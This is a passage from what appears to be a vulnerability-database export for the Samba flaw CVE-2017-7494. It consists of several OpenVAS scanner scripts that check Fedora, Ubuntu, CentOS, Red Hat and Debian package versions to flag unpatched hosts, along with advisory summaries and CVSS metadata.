extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ctdb / ctdb-tests / libsmbclient / libsmbclient-devel / libwbclient / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:34:38", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7494"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2017-05-27T00:00:00", "id": "OPENVAS:1361412562310872718", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872718", "type": "openvas", "title": "Fedora Update for samba FEDORA-2017-570c0071c4", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for samba FEDORA-2017-570c0071c4\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872718\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-05-27 07:02:25 +0200 (Sat, 27 May 2017)\");\n script_cve_id(\"CVE-2017-7494\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for samba FEDORA-2017-570c0071c4\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'samba'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"samba on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-570c0071c4\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/W4BBCPF57PGSZEEE47TVMTZE3RQ4V54I\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~4.4.14~0.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7494"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-05-25T00:00:00", "id": "OPENVAS:1361412562310843180", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843180", "type": "openvas", "title": "Ubuntu Update for samba USN-3296-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for samba USN-3296-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843180\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-05-25 06:50:14 +0200 (Thu, 25 May 2017)\");\n script_cve_id(\"CVE-2017-7494\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for samba USN-3296-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'samba'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that Samba incorrectly\nhandled shared libraries. A remote attacker could use this flaw to upload a\nshared library to a writable share and execute arbitrary code.\");\n script_tag(name:\"affected\", value:\"samba on Ubuntu 17.04,\n Ubuntu 16.10,\n Ubuntu 16.04 LTS,\n Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3296-1\");\n script_xref(name:\"URL\", value:\"https://www.ubuntu.com/usn/usn-3296-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|17\\.04|16\\.10|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"samba\", ver:\"2:4.3.11+dfsg-0ubuntu0.14.04.8\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU17.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"samba\", ver:\"2:4.5.8+dfsg-0ubuntu0.17.04.2\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"samba\", ver:\"2:4.4.5+dfsg-2ubuntu5.6\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"samba\", ver:\"2:4.3.11+dfsg-0ubuntu0.16.04.7\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:04", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7494"], "description": "Check the version of libsmbclient", "modified": "2019-03-08T00:00:00", "published": "2017-05-26T00:00:00", "id": "OPENVAS:1361412562310882726", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882726", "type": "openvas", "title": "CentOS Update for libsmbclient CESA-2017:1270 centos6", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for libsmbclient CESA-2017:1270 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882726\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-05-26 06:32:28 +0200 (Fri, 26 May 2017)\");\n script_cve_id(\"CVE-2017-7494\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for libsmbclient CESA-2017:1270 centos6\");\n script_tag(name:\"summary\", value:\"Check the version of libsmbclient\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Samba is an open-source implementation of\n the Server Message Block (SMB) protocol and the related Common Internet File\n System (CIFS) protocol, which allow PC-compatible machines to share files,\n printers, and various information. Security Fix(es): * A remote code execution\n flaw was found in Samba. A malicious authenticated samba client, having write\n access to the samba share, could use this flaw to execute arbitrary code as\n root. (CVE-2017-7494) Red Hat would like to thank the Samba project for\n reporting this issue. Upstream acknowledges steelo as the original reporter.\");\n script_tag(name:\"affected\", value:\"libsmbclient on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"CESA\", value:\"2017:1270\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2017-May/022419.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"libsmbclient\", rpm:\"libsmbclient~3.6.23~43.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient-devel\", rpm:\"libsmbclient-devel~3.6.23~43.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~3.6.23~43.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.6.23~43.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~3.6.23~43.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-doc\", rpm:\"samba-doc~3.6.23~43.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-domainjoin-gui\", rpm:\"samba-domainjoin-gui~3.6.23~43.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-swat\", rpm:\"samba-swat~3.6.23~43.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~3.6.23~43.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-clients\", rpm:\"samba-winbind-clients~3.6.23~43.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-devel\", rpm:\"samba-winbind-devel~3.6.23~43.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-krb5-locator\", rpm:\"samba-winbind-krb5-locator~3.6.23~43.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-glusterfs\", rpm:\"samba-glusterfs~3.6.23~43.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:13", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7494"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2017-05-25T00:00:00", "id": "OPENVAS:1361412562310871821", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871821", "type": "openvas", "title": "RedHat Update for samba RHSA-2017:1270-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for samba RHSA-2017:1270-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871821\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-05-25 06:49:34 +0200 (Thu, 25 May 2017)\");\n script_cve_id(\"CVE-2017-7494\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for samba RHSA-2017:1270-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'samba'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Samba is an open-source implementation of\nthe Server Message Block (SMB) protocol and the related Common Internet File\nSystem (CIFS) protocol, which allow PC-compatible machines to share files,\nprinters, and various information.\n\nSecurity Fix(es):\n\n * A remote code execution flaw was found in Samba. A malicious\nauthenticated samba client, having write access to the samba share, could\nuse this flaw to execute arbitrary code as root. (CVE-2017-7494)\n\nRed Hat would like to thank the Samba project for reporting this issue.\nUpstream acknowledges steelo as the original reporter.\");\n script_tag(name:\"affected\", value:\"samba on\n Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Server (v. 7),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"RHSA\", value:\"2017:1270-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2017-May/msg00034.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_(7|6)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~4.4.4~14.el7_3\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient\", rpm:\"libsmbclient~4.4.4~14.el7_3\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient\", rpm:\"libwbclient~4.4.4~14.el7_3\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~4.4.4~14.el7_3\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~4.4.4~14.el7_3\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client-libs\", rpm:\"samba-client-libs~4.4.4~14.el7_3\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-common-libs\", rpm:\"samba-common-libs~4.4.4~14.el7_3\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-common-tools\", rpm:\"samba-common-tools~4.4.4~14.el7_3\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-debuginfo\", rpm:\"samba-debuginfo~4.4.4~14.el7_3\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-krb5-printing\", rpm:\"samba-krb5-printing~4.4.4~14.el7_3\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-libs\", rpm:\"samba-libs~4.4.4~14.el7_3\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-python\", rpm:\"samba-python~4.4.4~14.el7_3\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~4.4.4~14.el7_3\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-clients\", rpm:\"samba-winbind-clients~4.4.4~14.el7_3\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-modules\", rpm:\"samba-winbind-modules~4.4.4~14.el7_3\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"libsmbclient\", rpm:\"libsmbclient~3.6.23~43.el6_9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~3.6.23~43.el6_9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.6.23~43.el6_9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~3.6.23~43.el6_9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-debuginfo\", rpm:\"samba-debuginfo~3.6.23~43.el6_9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~3.6.23~43.el6_9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-clients\", rpm:\"samba-winbind-clients~3.6.23~43.el6_9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:08", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7494"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2017-05-27T00:00:00", "id": "OPENVAS:1361412562310872719", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872719", "type": "openvas", "title": "Fedora Update for samba FEDORA-2017-642a0eca75", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for samba FEDORA-2017-642a0eca75\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872719\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-05-27 07:02:27 +0200 (Sat, 27 May 2017)\");\n script_cve_id(\"CVE-2017-7494\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for samba FEDORA-2017-642a0eca75\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'samba'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"samba on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-642a0eca75\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/OQBWJCQH74QID2Q4N44FYXHLGE6RU32S\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~4.5.10~0.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:38", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7494"], "description": "steelo discovered a remote code execution vulnerability in Samba, a\nSMB/CIFS file, print, and login server for Unix. A malicious client with\naccess to a writable share, can take advantage of this flaw by uploading\na shared library and then cause the server to load and execute it.", "modified": "2019-03-18T00:00:00", "published": "2017-05-24T00:00:00", "id": "OPENVAS:1361412562310703860", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703860", "type": "openvas", "title": "Debian Security Advisory DSA 3860-1 (samba - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3860.nasl 14280 2019-03-18 14:50:45Z cfischer $\n# Auto-generated from advisory DSA 3860-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703860\");\n script_version(\"$Revision: 14280 $\");\n script_cve_id(\"CVE-2017-7494\");\n script_name(\"Debian Security Advisory DSA 3860-1 (samba - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:50:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-05-24 00:00:00 +0200 (Wed, 24 May 2017)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2017/dsa-3860.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n script_tag(name:\"affected\", value:\"samba on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (jessie), this problem has been fixed in\nversion 2:4.2.14+dfsg-0+deb8u6.\n\nWe recommend that you upgrade your samba packages.\");\n script_tag(name:\"summary\", value:\"steelo discovered a remote code execution vulnerability in Samba, a\nSMB/CIFS file, print, and login server for Unix. A malicious client with\naccess to a writable share, can take advantage of this flaw by uploading\na shared library and then cause the server to load and execute it.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"ctdb\", ver:\"2:4.2.14+dfsg-0+deb8u6\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libnss-winbind\", ver:\"2:4.2.14+dfsg-0+deb8u6\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libpam-smbpass\", ver:\"2:4.2.14+dfsg-0+deb8u6\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = 